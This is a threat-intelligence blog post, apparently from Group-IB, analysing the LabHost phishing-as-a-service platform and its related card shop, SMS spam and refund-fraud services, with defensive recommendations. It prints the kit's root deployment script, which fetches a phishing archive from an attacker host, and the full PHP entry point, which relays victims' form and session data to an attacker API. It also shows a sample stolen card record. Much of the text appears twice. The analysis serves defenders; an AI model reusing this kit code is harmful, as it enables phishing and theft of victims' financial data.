In early 2024, Group-IB’s Threat Intelligence team observed a surge in phishing URLs targeting INTERAC, a Canadian payment service. Subsequently, a client operating in Canada reported an uptick in phishing attempts against their customers and shared a suspicious URL, lab-host[.]ru, prompting an investigation.
This inquiry unveiled a connection between the shared URL and INTERAC phishing pages, all originating from the LabHost Phishing-as-a-Service (PhaaS) platform.
In our latest blog post, we delve into the operations of LabHost and its subsidiary, LabCVV, exposing a sophisticated criminal network offering stolen credit card data for sale. While numerous PhaaS platforms exist, LabHost stands out due to its unique business model, which includes not only phishing services but also avenues for monetizing stolen credit cards and banking credentials through services like LabRefund.
We detail actionable insights and hunting techniques for Threat Intelligence and Anti-Fraud specialists to detect and mitigate such threats effectively. By shedding light on the fraudulent infrastructure behind LabHost and offering practical recommendations, this blog post aims to empower organizations in safeguarding their assets and clients against cyber threats.
Executive summary
The fraudulent ecosystem consists of three main entities:
- LabHost – PhaaS platform
- LabCVV – credit card shop
- LabSend – SMS/MMS spam delivery system
- LabRefund – TG channel and private groups where criminals teach their customers how to utilise stolen data
The first message related to LabHost was caught by Group-IB back in August 2021. We assume it is the date of foundation.
LabHost provides a platform to its users for orchestrating phishing attacks by automating processes of deployment and configuring phishing websites as well as modules for manual guiding of victims through some predefined attack scenarios. On top of that the service allows criminals to manage stolen logs and credit card information in a very convenient and comfortable way. Overall this approach significantly decreases requirements to tech skill of possible users and leads to an increasing amount of phishing attacks as a result.
Criminals start their path by renting a VPS server and auto-deploying a phishing website by providing access on the portal. Then in a few minutes the server is ready to be used.
The fraudster then generates links to a phishing page and sends it to victims using the LabSend service. LabSend is a spam service which provides its users an Android application and management panel for sending SMS/MMS messages using connected Android devices.
Victims receive a phishing link, open it and according to predefined scenarios guided through phishing pages which ask them to fill sensitive data like: credit card number, CVV, first and last name, date of birth, etc. The LabRat module here can be used by criminals to manually guide victims through attack scenarios in order to steal 2FA codes or any other information required to conduct a fraud.
After collecting logs with sensitive data and credit cards, criminals can use them to cash out money using drop accounts or sell them using the LabCVV shop. And there is another option with the service called LabRefund and supported by LabHost owners.
LabRefund is managed by LabHost owners and provides criminals with information on internet shops, where stolen credit cards can be used to order items and goods or even to make a refund on criminals’ accounts.
In other words, the LabHost ecosystem provides not only a tool to facilitate phishing attacks, but the whole infrastructure to monetize stolen data.
Investigation of DarkWeb forums and TG chats revealed at least 3 monikers highly likely connected to the criminal group: @MrSmartICQ, @Zimna514, @houdini13.
Also source codes of LabSend APK were uploaded to VirusTotal from Armenia via web interface. Which means that highly likely one of the developers is located in this country. VirusTotal reveals a link to github account.
Phishing-as-a-service
Dashboard and features
After creating an account, LabHost requires the user to purchase a subscription plan targeting North America or all other regions. The “North America” membership subscription is available in monthly, quarterly, and yearly payment plans at US$250 per month, whereas the “World” subscription is only available in monthly payments of US$300.
The subscription offers access to a fully automated deployment process for phishing pages, along with IP and device filtering based on geo-location and user agent, respectively; additionally, subscribers gain access to LabRat, a feature akin to O-panel and OV6 modules in uAdmin kit, facilitating real-time scenario control for stealing 2FA and other sensitive information, with an accompanying dashboard upon login displaying statistics on collected logs, stolen credit cards, geographical distribution of victims, and a list of recent victim sessions associated with phishing pages.
The service provides support via a ticket system, so any user can initiate a conversation with LabHost:
Creating a phishing site
The process of creating phishing websites is super simple and fully automated. It doesn’t require any technical knowledge from a criminal: just pay for a subscription and click a few buttons.
Once a criminal rent a VPS (running a CentOs or Ubuntu), he needs to allow root access and fill in root password during deployment process on LabHost:
The user can then choose from a list of 28 financial institutions, 12 online retail and service providers, and other real-world companies in the North America region to create a phishing site.
The attacker can also filter visitors by their location (using geo IP) and/or their device (using browser’s user-agent). The system also allows criminals to determine where their victim will be redirected after theft: the real website of the lured organization, Bing, Yahoo, Google, Apple, etc. All options are listed above on the screenshot.
This final phase is actually very important. In case of redirection to a real website, organisations can detect phishing websites pretty fast by analysing referrers of the visitors to their website. It is one of a part of Fraud Protection product provided by Group-IB which is the most efficient way to mitigate the threat.
When everything required is specified and provided the backend logins via root to the VPS and executes the following batch script (DHL page is used as an example):
echo LabHost test cat /etc/*release apt install sudo -y sudo sed -i "s/#precedence ::ffff:0:0\/96 100/precedence ::ffff:0:0\/96 100/" /etc/gai.conf export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y --force-yes software-properties-common apt-add-repository ppa:ondrej/apache2 -y apt-add-repository ppa:ondrej/php -y apt-get update -y add-apt-repository universe -y apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes build-essential curl pkg-config zip unzip apache2 apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes php libapache2-mod-php php-cli php-dev php-pgsql php-sqlite3 php-gd php-curl php-memcached php-imap php-mysql php-mbstring php-xml php-zip php-bcmath php-soap php-intl php-readline php-msgpack php-igbinary php-gmp sudo sed -i '//,/<\/Directory>/ s#AllowOverride None#AllowOverride All#' /etc/apache2/apache2.conf a2enmod rewrite systemctl restart apache2 apt-get update -y apt install unzip -y rm -rf /var/www/html/.htaccess rm -rf /var/www/html/* sudo wget -P /var/www/html --no-check-certificate "https://instapi-1xoa93z90o348fz.co/file-xm3728d/1709912030/global-dhl.zip" sudo unzip /var/www/html/global-dhl.zip -d /var/www/html sudo rm -f /var/www/html/global-dhl.zip sudo chmod -R 755 /var/www/html sudo sed -i 's/{{apikey}}//' /var/www/html/app/init.php sudo sed -i 's#{{url}}#https://api2-4hdfix74ks.co#' /var/www/html/app/init.php sudo systemctl restart apache2
So the script for other targets is very similar to the above. The only thing that changed is the URL where the phishing kit archive is located. However, all of them referred to instapi-1xoa93z90o348fz.co.
Another interesting finding in this script is the API address, where the subscription is checked: api2-4hdfix74ks.co.
LabRat aka real-time victim control module
Once a phishing server is set up a link is generated and can be sent to a victim. When the victim visits the phishing site and passes all filters based on the browser’s UA and IP geolocation a phishing page is shown.
Whenever a victim visits the phishing website, the server performs a request to check whether the hardcoded API key is valid and the subscription is active. If these checks are successful a criminal can observe an active session in the panel:
To work with active sessions, the criminals have to use the LABRAT module, which actually not a RAT at all, but just a dynamic module to control fraud scenarios and request a victim to provide additional information like 2FA code, PI data (date of birth, first and last names, driver license number, etc.), etc. It is very similar to O-panel module implemented in the notorious uAdmin phishing kit.
For example here it allows to choose from the following scenarios:
While an operator is choosing scenario, a victims observers loading stub:
Source codes analysis
Every targeted organization has its own template, however the general structure is the same. For this example we analyze an archive used as a template targeting it’s victim:
Folder structure
arrow_drop_down
The entry point for this web app os ./app/init.php:
<?php session_start(); ob_start(); define('HOME_FOLDER', $_SERVER['DOCUMENT_ROOT']); date_default_timezone_set('Europe/London'); $globalurl = '{{url}}'; $apikey = '{{apikey}}'; $route = $_SERVER['REQUEST_URI']; $url = $globalurl . $route; $_SERVER['HOST_IP'] = gethostbyname($_SERVER['SERVER_NAME']); $post = [ 'post' => isset($_POST) ? $_POST : [], 'session' => isset($_SESSION) ? $_SESSION : [], 'server' => isset($_SERVER) ? $_SERVER : [], 'apikey' => $apikey ]; $splitter = explode('.', $route); $extension = $splitter[count($splitter) - 1]; $headers = [ 'css' => 'text/css', 'js' => 'text/javascript', 'gif' => 'image/gif', 'html' => 'text/html', 'htm' => 'text/html', 'ico' => 'image/vnd.microsoft.icon', 'jpeg' => 'image/jpeg', 'jpg' => 'image/jpeg', 'png' => 'image/png', 'json' => 'application/json', 'php' => 'application/x-httpd-php', 'woff' => 'font/woff', 'woff2' => 'font/woff2', 'xml' => 'application/xml', 'svg' => 'image/svg+xml' ]; $header = isset($headers[$extension]) ? $headers[$extension] : ''; if (empty($header)) { $download = rtrim(downloadString($url, $post), 0); $response = json_decode($download, true); if (isset($response['session']) && is_array($response['session'])) { foreach ($response['session'] as $sname => $sval) { $_SESSION[$sname] = $sval; } } //die($download); switch ($response['type']) { case 0: $udata = json_decode(json_encode($response['data'])); break; case 1: $redirect = !empty($response['redirect']) ? 'location: ' . $response['redirect'] : 'refresh:0'; header($redirect); die(); break; case 2: http_response_code(404); require_once HOME_FOLDER . '/pages/misc/unavailable.php'; die(); break; case 3: http_response_code(403); die(); break; case 4: http_response_code(404); die(); break; case 5: http_response_code(404); require_once HOME_FOLDER . '/pages/misc/suspended.php'; die(); break; } if (empty($download)) { http_response_code(404); //require_once HOME_FOLDER . '/pages/misc/unavailable.php'; die(); } } else { header('Content-type: ' . $header); echo downloadString($url); } function downloadString($url, $data = null) { $ch = curl_init($url); if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); $response = $result !== false ? $result : ''; curl_close($ch); return $response; } function pdump($var) { echo '<pre>'; var_dump($var); echo '</pre>'; die; } function escape($string, $default = '') { if (is_array($string)) $string = $default; return htmlentities(html_entity_decode($string), ENT_QUOTES, 'UTF-8'); } function ab_randomstr($length = 8) { $randomString = ''; $characters = implode("", array_merge(range('a', 'z'), range('A', 'Z'))); for ($i = 0; $i < $length; $i++) $randomString .= $characters[mt_rand(0, strlen($characters) - 1)]; return $randomString; } function ab_enc($output) { $randomFunc = ab_randomstr(mt_rand(6, 12)); $randomOut = ab_randomstr(mt_rand(6, 12)); $randomNum = ab_randomstr(mt_rand(6, 12)); $randomVal = mt_rand(1337, 99999999); $return = '<script>' . PHP_EOL; $return .= 'var ' . $randomOut . ' = "";' . PHP_EOL; $return .= 'var ' . $randomNum . ' = ['; foreach(str_split($output) as $x) { $return .= (ord($x) + $randomVal) . ', '; } $return = rtrim($return, ', '); $return .= '];' . PHP_EOL; $return .= $randomNum . '.forEach(function ' . $randomFunc . '(value) { ' . $randomOut . ' += String.fromCharCode(parseInt(value) - ' . $randomVal . '); } );' . PHP_EOL; $return .= 'document.write(' . $randomOut . ');'; $return .= '</script>'; return $return; } function output($encrypt = false) { global $response; $device = $response['server']['devices'] ?? ''; $output = ob_get_contents(); ob_clean(); if (strpos($_SERVER["SCRIPT_FILENAME"], 'api') === false) { if ($device == '1') { $output .= "<script>setTimeout(function() { if (screen.width >= 600) { window.location = '/notfound'; } }, 100);</script>"; } else if ($device == '2') { $output .= "<script>setTimeout(function() { if (screen.width < 600) { window.location = '/notfound'; } }, 100);</script>"; } } $die = $encrypt ? ab_enc($output) : $output; die($die); }
This code shows that every time a victim visits the phishing website, the server sends the API key to the mentioned above (see “Creating a phishing site” section) api2-4hdfix74ks.co, where the subscription status is checked.
DarkWeb/Telegram analysis
An investigation of darkweb forums and Telegram channels revealed messages about “Labhost” from August 2021.
The service was most actively promoted by three users in Canadian Telegram chats: @MrSmartICQ, @Zimna514 and @houdini13.
The first mentions of “Labhost” from August 24, 2021, were found in the Montreal Telegram chat @mtltrap (🇨🇦𝗠𝗧𝗟 𝗧𝗥𝗔𝗣𝗦𝗧𝗔𝗥𝗦🇨🇦). Currently, the chat has been deleted, but the messages have been archived by the Group-IB Threat Intelligence system.
Messages were sent from accounts https://t.me/MrSmartICQ (id 724887901) and https://t.me/houdini13 (id 882956983). Both accounts are still active, have not changed their usernames, and belong to the same individuals as in 2021.
On September 6, 2021, the first message was sent with a link to the Telegram channel https://t.me/labhost.
The channel was created on August 17, 2021, and the first messages appeared on August 29, 2021. The Telegram channel remains active and is still used by “Labhost”.
On September 7, 2021, @MrSmartICQ announced the first domain “LabHost” – https://labhost[.]cc. A similar message was also published on the Telegram channel @labhost.
The third account promoting “LabHost” was https://t.me/Zimna514 (id 2012343631). On October 3, 2021, on the Telegram channel @mtltrap, he posted a message with the new domain https://labhost[.]co. Unlike the other two accounts, @Zimna514 is already deleted.
Houdini13 also owns the service “The Lab Refunds” with the Telegram channels https://t.me/TheLabRefunds and https://t.me/labrefundvouch. This service also operates only in Canada. We assume that this way it is possible to purchase stuff with a stolen card and refund the money to the threat actor’s or a drop card.
Using stolen accounts or credit card data obtained through phishing, fraudsters purchase stuff on legitimate online stores such as Amazon, Zara, Puma, Asos, Monos. The service “The Lab Refunds” assists them in refunds.
In August 2023, @houdini13 also advertised a service for spam mailings “Lab Send” (https://t.me/LabSend, https://labsend[.]co).
In addition to the clear focus of the “LabHost” service on Canada and advertising in the Montreal chat, there are also indications that individuals associated with “LabHost” are located in Canada.
This mainly concerns the user @houdini13. Since September 2021, he has been selling “Canada profiles”.
For this purpose, he created the Telegram bot @HoudiniProfiles_Bot, later changed to https://t.me/ProfileShop_Bot, which still works.
We found 115 messages advertising @HoudiniProfiles_Bot in Telegram chat @mtltrap and only one of them was not sent by @houdini13. It was a message with completely matching text, but it was sent by @Zimna514.
In August and September 2021, “LabHost” was advertised by the accounts @MrSmartICQ and @houdini13, but since October 2021, it has been advertised by @MrSmartICQ and @Zimna514. We assume that the accounts @houdini13 and @Zimna514 belonged to the same person.
The most interesting mention of Canada was in 2021. @houdini13 in the already deleted telegram chat @NoirsRefunds was looking for Rolex, and in September he was already trying to refund it from Canada.
As for the account @Zimna514, although it has now been deleted, it is a very unique username. A search for “Zimna514” revealed that only one person uses this nickname, coincidentally a Canadian citizen. However, at the moment, we do not have enough data to assert his involvement with “LabHost”.
There is less public information about the account @MrSmartICQ, but it is also associated with Canada.
Even a year before the creation of “LabHost“, in September 2020, @MrSmartICQ was looking for a database of profiles from Canada.
Interestingly, in 2022, he was looking for a designer to improve his website and apparently found one.
LabSend spam management service
LabSend spam service was initially released in 2022. According to their TG channel it is a device manager platform which facilitates spam campaign via SMS/MMS messages.
Key Features
- Unlimited Devices
- SMS and MMS Sending
- Syntax Messaging (message randomizer)
- Auto Responder
- Custom Delays
- Message Templates
- Multiple Languages
- Responsive Support
- Constant Updates
Moreover the ad says that combining LabHost together with LabSend maximizes results.
All marketing materials (like videos, GUI) are created in a very professional way. The subscription is pretty cheap for a such kind of services:
Users of LabSend service should download and install an APK on their Android devices, and then via the web platform they can perform spam campaigns sending phishing links to victims.
Group-IB found this APK uploaded to VirusTotal on 2023-11-20 with SHA1 hash cda695baad4be4f6067195395997360337a43d6f . Based on our RE analysis it uses labsend[.]co and files.labsend[.]co as C2 addresses.
LabCVV Card Shop
Official TG group of LabHost on 3rd of January 2024 started to advertise LabCVV credit card shop.
The credit card shop has a very similar UI to LabHost service. This similarity and the fact that CC shop is promoted by LabHost lead to the assumption that both services belong to the same criminal group behind OR at least were developed by the same web designer.
Example of purchased data:
|============ Details ===========| | Full Name: | Address: | City: Laval | Postal Code: H7T 0E2 | Phone: | DOB: 10/09/1953 | | Date: 09:15:01pm | Browser: Mobile Safari | OS: iOS | Location: Montreal, Canada | IP Geo: http://www.geoiptool.com/?IP=142.169.16.238 | User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1 | |============ Card Info ===========| | Card: | Expiry: 03/23 | Cvv: | | Bank: | Scheme: VISA | Type: DEBIT | Brand: TRADITIONAL | Bin: | Country: CA | Prepaid: NON-PREPAID | | Time: 09:15:59pm | |============ Card Info ===========| | Card: | Expiry: 03/23 | Cvv: 413 | | Bank: | Scheme: VISA | Type: DEBIT | Brand: TRADITIONAL | Bin: | Country: CA | Prepaid: NON-PREPAID |
Recommendations
For common users
- Always be cautious and fully aware of anything sent to you, even if you think it may be legitimate.
- Do not click on any links that you are not 100% confident are real
- Double check the address of a website is the official one before you submit any information
- If the link comes from someone you know, confirm with that person using another way of communication
- Contact the organization thatwhich sent you a link to confirm they have really sent you that message
- If in doubt, use services like URLScan or VirusTotal to quickly scan the URL you have been sent, and look for red flags
- If you think you may be a victim of a phishing attack, contact your bank and local enforcement agencies immediately with information about the organization being impersonated by the fraudsters and the police. They can issue an alert which may ultimately raise awareness and reduce the victim count.
- Keep in mind that usually official organizations do not use URL shorteners, so links leading to bit.ly, s.id, tny.sh and others, are very suspicious and you should double check the final destination
- Report any identified phishing email or SMS to fraudehelpdesk.nl, scamadviser.com, organizations that were lured. These reports aid cybersecurity professionals to investigate and take action against fraudulent websites, in addition to helping protect other victims.
For targeted businesses
Fighting this type of threat relies on different ways. Let’s enumerate them in order of efficiency:
- Continuous monitoring and detection of phishing websites and their take-down process
- Analysing the infrastructure and taking it down
- A state-of-the-art anti-fraud solution that can detect and block unauthorized logins and transactions
- An investigation focused on finding identities of criminals behind the Phaas.
While the first two approaches can temporarily mitigate the threat, they require continuous investments and don’t guarantee 100% coverage.
At Group-IB we advise our corporate customers to investigate specific phenomena and identify criminals behind a scheme. For financial organizations we recommend installing Group-IB’s Fraud Protection Service.
Our Fraud Protection team recommends:
- Continuous surveillance of new threats and beginning the phishing site takedown process using Threat Intelligence and Digital risk or Brand protection providers. These services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk.
- Implement active call detection using session monitoring systems, Abnormal call duration, Remote Access Detection, parallel access to a user account from different devices, and Access from well-known fraudulent devices.
According to the Group-IB Fraud Matrix, the following detection and mitigation steps for this scheme are required:
Resource Development
Internal mule accounts
- Detections:
Data Source | Data Component | Description |
Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions |
Trust abuse
Mitigations:
Data Source | Data Component | Description |
Threat intelligence providers | Dark web, instant messages, monitoring | Threat intelligence services help an organization generate its threat intelligence information and track trends to inform defensive priorities to mitigate risk. |
Digital risk or brand protection providers | Brand abuse | Digital or brand protection services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk. |
Account access
Detections:
Data Source | Data Component | Description |
Sessional Monitoring | Non-monetary transaction | Parallel access to a user account from different devices |
Device fingerprinting | access from well-known fraudulent devices. |
Perform fraud
Detections:
Data Source | Data Component | Description |
Transaction Monitoring | Real-time Transaction Monitoring | Flaggin unusual patterns such as frequent transfers to newly created or unrelated accounts, high-volume transactions inconsistent with typical customer behaviour, and transfers to accounts with no apparent legitimate connection to the sender. |
Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions |
Phishy Business: Unraveling LabHost’s scam ecosystem
Group-IB takes part in a global operation to cripple Canadian Phishing-as-a-Service provider LabHost
April 18, 2024 · 24 min to read · Threat Intelligence
LabHost
Phishing-as-a-Service
Threat Intelligence
In early 2024, Group-IB’s Threat Intelligence team observed a surge in phishing URLs targeting INTERAC, a Canadian payment service. Subsequently, a client operating in Canada reported an uptick in phishing attempts against their customers and shared a suspicious URL, lab-host[.]ru, prompting an investigation.
This inquiry unveiled a connection between the shared URL and INTERAC phishing pages, all originating from the LabHost Phishing-as-a-Service (PhaaS) platform.
In our latest blog post, we delve into the operations of LabHost and its subsidiary, LabCVV, exposing a sophisticated criminal network offering stolen credit card data for sale. While numerous PhaaS platforms exist, LabHost stands out due to its unique business model, which includes not only phishing services but also avenues for monetizing stolen credit cards and banking credentials through services like LabRefund.
We detail actionable insights and hunting techniques for Threat Intelligence and Anti-Fraud specialists to detect and mitigate such threats effectively. By shedding light on the fraudulent infrastructure behind LabHost and offering practical recommendations, this blog post aims to empower organizations in safeguarding their assets and clients against cyber threats.
Executive summary
The fraudulent ecosystem consists of three main entities:
- LabHost – PhaaS platform
- LabCVV – credit card shop
- LabSend – SMS/MMS spam delivery system
- LabRefund – TG channel and private groups where criminals teach their customers how to utilise stolen data
The first message related to LabHost was caught by Group-IB back in August 2021. We assume it is the date of foundation.
LabHost provides a platform to its users for orchestrating phishing attacks by automating processes of deployment and configuring phishing websites as well as modules for manual guiding of victims through some predefined attack scenarios. On top of that the service allows criminals to manage stolen logs and credit card information in a very convenient and comfortable way. Overall this approach significantly decreases requirements to tech skill of possible users and leads to an increasing amount of phishing attacks as a result.
Criminals start their path by renting a VPS server and auto-deploying a phishing website by providing access on the portal. Then in a few minutes the server is ready to be used.
The fraudster then generates links to a phishing page and sends it to victims using the LabSend service. LabSend is a spam service which provides its users an Android application and management panel for sending SMS/MMS messages using connected Android devices.
Victims receive a phishing link, open it and according to predefined scenarios guided through phishing pages which ask them to fill sensitive data like: credit card number, CVV, first and last name, date of birth, etc. The LabRat module here can be used by criminals to manually guide victims through attack scenarios in order to steal 2FA codes or any other information required to conduct a fraud.
After collecting logs with sensitive data and credit cards, criminals can use them to cash out money using drop accounts or sell them using the LabCVV shop. And there is another option with the service called LabRefund and supported by LabHost owners.
LabRefund is managed by LabHost owners and provides criminals with information on internet shops, where stolen credit cards can be used to order items and goods or even to make a refund on criminals’ accounts.
In other words, the LabHost ecosystem provides not only a tool to facilitate phishing attacks, but the whole infrastructure to monetize stolen data.
Investigation of DarkWeb forums and TG chats revealed at least 3 monikers highly likely connected to the criminal group: @MrSmartICQ, @Zimna514, @houdini13.
Also source codes of LabSend APK were uploaded to VirusTotal from Armenia via web interface. Which means that highly likely one of the developers is located in this country. VirusTotal reveals a link to github account.
Phishing-as-a-service
Dashboard and features
After creating an account, LabHost requires the user to purchase a subscription plan targeting North America or all other regions. The “North America” membership subscription is available in monthly, quarterly, and yearly payment plans at US$250 per month, whereas the “World” subscription is only available in monthly payments of US$300.
The subscription offers access to a fully automated deployment process for phishing pages, along with IP and device filtering based on geo-location and user agent, respectively; additionally, subscribers gain access to LabRat, a feature akin to O-panel and OV6 modules in uAdmin kit, facilitating real-time scenario control for stealing 2FA and other sensitive information, with an accompanying dashboard upon login displaying statistics on collected logs, stolen credit cards, geographical distribution of victims, and a list of recent victim sessions associated with phishing pages.
The service provides support via a ticket system, so any user can initiate a conversation with LabHost:
Creating a phishing site
The process of creating phishing websites is super simple and fully automated. It doesn’t require any technical knowledge from a criminal: just pay for a subscription and click a few buttons.
Once a criminal rent a VPS (running a CentOs or Ubuntu), he needs to allow root access and fill in root password during deployment process on LabHost:
The user can then choose from a list of 28 financial institutions, 12 online retail and service providers, and other real-world companies in the North America region to create a phishing site.
The attacker can also filter visitors by their location (using geo IP) and/or their device (using browser’s user-agent). The system also allows criminals to determine where their victim will be redirected after theft: the real website of the lured organization, Bing, Yahoo, Google, Apple, etc. All options are listed above on the screenshot.
This final phase is actually very important. In case of redirection to a real website, organisations can detect phishing websites pretty fast by analysing referrers of the visitors to their website. It is one of a part of Fraud Protection product provided by Group-IB which is the most efficient way to mitigate the threat.
When everything required is specified and provided the backend logins via root to the VPS and executes the following batch script (DHL page is used as an example):
echo LabHost test cat /etc/*release apt install sudo -y sudo sed -i "s/#precedence ::ffff:0:0\/96 100/precedence ::ffff:0:0\/96 100/" /etc/gai.conf export DEBIAN_FRONTEND=noninteractive apt-get update -y apt-get install -y --force-yes software-properties-common apt-add-repository ppa:ondrej/apache2 -y apt-add-repository ppa:ondrej/php -y apt-get update -y add-apt-repository universe -y apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes build-essential curl pkg-config zip unzip apache2 apt-get install -o Dpkg::Options::="--force-confdef" -o Dpkg::Options::="--force-confold" -y --force-yes php libapache2-mod-php php-cli php-dev php-pgsql php-sqlite3 php-gd php-curl php-memcached php-imap php-mysql php-mbstring php-xml php-zip php-bcmath php-soap php-intl php-readline php-msgpack php-igbinary php-gmp sudo sed -i '//,/<\/Directory>/ s#AllowOverride None#AllowOverride All#' /etc/apache2/apache2.conf a2enmod rewrite systemctl restart apache2 apt-get update -y apt install unzip -y rm -rf /var/www/html/.htaccess rm -rf /var/www/html/* sudo wget -P /var/www/html --no-check-certificate "https://instapi-1xoa93z90o348fz.co/file-xm3728d/1709912030/global-dhl.zip" sudo unzip /var/www/html/global-dhl.zip -d /var/www/html sudo rm -f /var/www/html/global-dhl.zip sudo chmod -R 755 /var/www/html sudo sed -i 's/{{apikey}}//' /var/www/html/app/init.php sudo sed -i 's#{{url}}#https://api2-4hdfix74ks.co#' /var/www/html/app/init.php sudo systemctl restart apache2
So the script for other targets is very similar to the above. The only thing that changed is the URL where the phishing kit archive is located. However, all of them referred to instapi-1xoa93z90o348fz.co.
Another interesting finding in this script is the API address, where the subscription is checked: api2-4hdfix74ks.co.
LabRat aka real-time victim control module
Once a phishing server is set up a link is generated and can be sent to a victim. When the victim visits the phishing site and passes all filters based on the browser’s UA and IP geolocation a phishing page is shown.
Whenever a victim visits the phishing website, the server performs a request to check whether the hardcoded API key is valid and the subscription is active. If these checks are successful a criminal can observe an active session in the panel:
To work with active sessions, the criminals have to use the LABRAT module, which actually not a RAT at all, but just a dynamic module to control fraud scenarios and request a victim to provide additional information like 2FA code, PI data (date of birth, first and last names, driver license number, etc.), etc. It is very similar to O-panel module implemented in the notorious uAdmin phishing kit.
For example here it allows to choose from the following scenarios:
While an operator is choosing scenario, a victims observers loading stub:
Source codes analysis
Every targeted organization has its own template, however the general structure is the same. For this example we analyze an archive used as a template targeting it’s victim:
Folder structure
arrow_drop_down
The entry point for this web app os ./app/init.php:
<?php session_start(); ob_start(); define('HOME_FOLDER', $_SERVER['DOCUMENT_ROOT']); date_default_timezone_set('Europe/London'); $globalurl = '{{url}}'; $apikey = '{{apikey}}'; $route = $_SERVER['REQUEST_URI']; $url = $globalurl . $route; $_SERVER['HOST_IP'] = gethostbyname($_SERVER['SERVER_NAME']); $post = [ 'post' => isset($_POST) ? $_POST : [], 'session' => isset($_SESSION) ? $_SESSION : [], 'server' => isset($_SERVER) ? $_SERVER : [], 'apikey' => $apikey ]; $splitter = explode('.', $route); $extension = $splitter[count($splitter) - 1]; $headers = [ 'css' => 'text/css', 'js' => 'text/javascript', 'gif' => 'image/gif', 'html' => 'text/html', 'htm' => 'text/html', 'ico' => 'image/vnd.microsoft.icon', 'jpeg' => 'image/jpeg', 'jpg' => 'image/jpeg', 'png' => 'image/png', 'json' => 'application/json', 'php' => 'application/x-httpd-php', 'woff' => 'font/woff', 'woff2' => 'font/woff2', 'xml' => 'application/xml', 'svg' => 'image/svg+xml' ]; $header = isset($headers[$extension]) ? $headers[$extension] : ''; if (empty($header)) { $download = rtrim(downloadString($url, $post), 0); $response = json_decode($download, true); if (isset($response['session']) && is_array($response['session'])) { foreach ($response['session'] as $sname => $sval) { $_SESSION[$sname] = $sval; } } //die($download); switch ($response['type']) { case 0: $udata = json_decode(json_encode($response['data'])); break; case 1: $redirect = !empty($response['redirect']) ? 'location: ' . $response['redirect'] : 'refresh:0'; header($redirect); die(); break; case 2: http_response_code(404); require_once HOME_FOLDER . '/pages/misc/unavailable.php'; die(); break; case 3: http_response_code(403); die(); break; case 4: http_response_code(404); die(); break; case 5: http_response_code(404); require_once HOME_FOLDER . '/pages/misc/suspended.php'; die(); break; } if (empty($download)) { http_response_code(404); //require_once HOME_FOLDER . '/pages/misc/unavailable.php'; die(); } } else { header('Content-type: ' . $header); echo downloadString($url); } function downloadString($url, $data = null) { $ch = curl_init($url); if ($data) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); $response = $result !== false ? $result : ''; curl_close($ch); return $response; } function pdump($var) { echo '<pre>'; var_dump($var); echo '</pre>'; die; } function escape($string, $default = '') { if (is_array($string)) $string = $default; return htmlentities(html_entity_decode($string), ENT_QUOTES, 'UTF-8'); } function ab_randomstr($length = 8) { $randomString = ''; $characters = implode("", array_merge(range('a', 'z'), range('A', 'Z'))); for ($i = 0; $i < $length; $i++) $randomString .= $characters[mt_rand(0, strlen($characters) - 1)]; return $randomString; } function ab_enc($output) { $randomFunc = ab_randomstr(mt_rand(6, 12)); $randomOut = ab_randomstr(mt_rand(6, 12)); $randomNum = ab_randomstr(mt_rand(6, 12)); $randomVal = mt_rand(1337, 99999999); $return = '<script>' . PHP_EOL; $return .= 'var ' . $randomOut . ' = "";' . PHP_EOL; $return .= 'var ' . $randomNum . ' = ['; foreach(str_split($output) as $x) { $return .= (ord($x) + $randomVal) . ', '; } $return = rtrim($return, ', '); $return .= '];' . PHP_EOL; $return .= $randomNum . '.forEach(function ' . $randomFunc . '(value) { ' . $randomOut . ' += String.fromCharCode(parseInt(value) - ' . $randomVal . '); } );' . PHP_EOL; $return .= 'document.write(' . $randomOut . ');'; $return .= '</script>'; return $return; } function output($encrypt = false) { global $response; $device = $response['server']['devices'] ?? ''; $output = ob_get_contents(); ob_clean(); if (strpos($_SERVER["SCRIPT_FILENAME"], 'api') === false) { if ($device == '1') { $output .= "<script>setTimeout(function() { if (screen.width >= 600) { window.location = '/notfound'; } }, 100);</script>"; } else if ($device == '2') { $output .= "<script>setTimeout(function() { if (screen.width < 600) { window.location = '/notfound'; } }, 100);</script>"; } } $die = $encrypt ? ab_enc($output) : $output; die($die); }
This code shows that every time a victim visits the phishing website, the server sends the API key to the mentioned above (see “Creating a phishing site” section) api2-4hdfix74ks.co, where the subscription status is checked.
DarkWeb/Telegram analysis
An investigation of darkweb forums and Telegram channels revealed messages about “Labhost” from August 2021.
The service was most actively promoted by three users in Canadian Telegram chats: @MrSmartICQ, @Zimna514 and @houdini13.
